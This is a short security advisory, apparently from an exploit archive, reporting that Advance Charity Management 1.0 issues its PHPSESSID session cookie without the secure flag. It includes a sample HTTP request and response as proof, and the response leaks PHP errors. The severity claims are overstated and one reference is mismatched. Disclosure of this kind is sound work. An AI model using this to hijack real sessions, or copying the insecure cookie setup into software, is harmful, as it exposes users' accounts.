Authored by nu11secur1ty

Advance Charity Management version 1.0 fails to set the secure flag on a session identifier.

## Title: Advance Charity Management-1.0 - TLS cookie without secure
flag set-PHPSESSID NEVER EXPIRATION-current session-Hijacking
## Author: nu11secur1ty
## Date: 06.04.2023
## Vendor: https://www.sourcecodester.com/users/aown-shah
## Software: https://www.sourcecodester.com/php/16607/advance%C2%A0charity-management-system.html
## Reference: https://portswigger.net/kb/issues/00500600_cookie-without-httponly-flag-set

## Description:
The following cookie was issued by the application and does not have
the secure flag set:
PHPSESSID: The cookie appears to contain a session token, which may
increase the risk associated with this issue. You should review the
contents of the cookie to determine its function. The attacker can use
the same browser on the same machine to connect with the already
logged user before this moment, end he can do very nasty stuff with
this already authenticated account. This is a 100% CRITICAL SITUATION
if this will happen
inside of the network level 2 of some companies.

STATUS: HIGH Vulnerability

[+]Exploit:
```GET
GET /pwnedhost7/members/ HTTP/1.1
Host: pwnedhost7.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Referer: https://pwnedhost7.com/pwnedhost7/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="114", "Chromium";v="114"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0

```

[+]Response:
```HTTP
HTTP/1.1 200 OK
Date: Sun, 04 Jun 2023 10:13:00 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Set-Cookie: PHPSESSID=hudiao5n9p6rjld5oaju24lbca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25629

<script type="text/javascript">window.location="login.php"; </script><br />
<b>Notice</b>:  Undefined index: rainbow_uid in
<b>C:xampp7.4htdocspwnedhost7membersheader.php</b> on line
<b>7</b><br />
<br />
<b>Warning</b>:  mysqli_fetch_assoc() expects parameter 1 to be
mysqli_result, bool given in
<b>C:xampp7.4htdocspwnedhost7membersheader.php</b> on line
<b>12</b>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Aown-Shah/2023/Advance-Charity-Management-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/advance-charity-management-10-tls.html)

## Time spend:
00:37:00


RELATED ARTICLESMORE FROM AUTHOR